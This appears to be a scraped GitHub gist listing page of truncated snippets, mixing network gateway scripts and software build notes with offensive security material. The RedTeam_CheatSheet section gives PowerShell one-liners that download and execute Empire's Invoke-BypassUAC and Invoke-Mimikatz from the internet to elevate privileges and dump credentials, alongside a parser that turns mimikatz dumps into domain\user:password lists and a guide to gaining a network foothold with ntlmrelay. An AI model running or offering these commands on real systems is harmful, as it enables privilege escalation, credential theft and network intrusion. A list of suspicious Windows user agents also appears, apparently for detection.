EK_ jivoi
living off the land!
View gw_down.sh
#!/bin/bash
IF_IN="eth0"
IF_OUT="wlan0"
SUB="192.168.100"
echo "[+] Bringing interface ${IF_IN} down"
ip addr del ${SUB}.1/24 dev ${IF_IN}
ip link set dev ${IF_IN} down
echo "[+] Removing iptable rules"
View gw_up.sh
#!/bin/bash
IF_IN="eth0"
IF_OUT="wlan0"
SUB="192.168.100"
echo "[+] Creating DHCP server config."
cat <<EOF > /etc/dhcp/dhcp.${IF_IN}.conf
option routers ${SUB}.1;
option domain-name-servers ${SUB}.1;
default-lease-time 14440;
View One-liner Mimikatz Parser
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password".
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
@jivoi
jivoi / pwn-o-magic.md
Created Jul 16, 2019 — forked from braimee/pwn-o-magic.md
Pwning internal networks automagically
View pwn-o-magic.md

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
View Native-Windows-Useragents-malicious.txt
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
Mozilla/*WindowsPowerShell/*
System.Net.WebClient.DownloadFile():
None
//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*
//certutil.exe - manually whitelist legit content first:
@jivoi
jivoi / AtomicTestsCommandLines.txt
Created Sep 5, 2018
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
View AtomicTestsCommandLines.txt
(ASCII-art banner: ATOMIC RED TEAM)
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
View RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
View update curl from source
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://curl.haxx.se/download/curl-7.60.0.tar.gz
tar xzf curl-7.60.0.tar.gz
# enter the extracted source tree before configuring (the original omitted this step)
cd curl-7.60.0
./buildconf
./configure
# checkinstall runs make install and wraps the result in a .deb so it can be removed later with dpkg
checkinstall
dpkg -i /root/curl/curl-7.60.0/curl_7.60.0-1_amd64.deb
View ubuntu_18.04_mini_i3.md

Minimal i3 Ubuntu 18.04

TL,DR

A fully functional and good-looking Linux for less than 256 MB of RAM

Setting Up

Downloading and installing

Get the "mini.iso" image from archive.ubuntu.com

Legacy boot

Just flash a USB drive with it as follows.

sudo dd bs=4M if=mini.iso of=/dev/sd<?> conv=fdatasync && sync
View gist:92b393ef168a8f5434bd7f4b527ab2b6
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://www.inet.no/dante/files/dante-1.4.2.tar.gz
# extract and enter the source tree before configuring (the original omitted this step)
tar xzf dante-1.4.2.tar.gz
cd dante-1.4.2
./configure
make
# checkinstall packages the install as a .deb so it can be tracked and removed by dpkg
sudo checkinstall
sudo dpkg -i dante_1.4.2-1_amd64.deb
# /etc/sockd.conf
# logoutput: syslog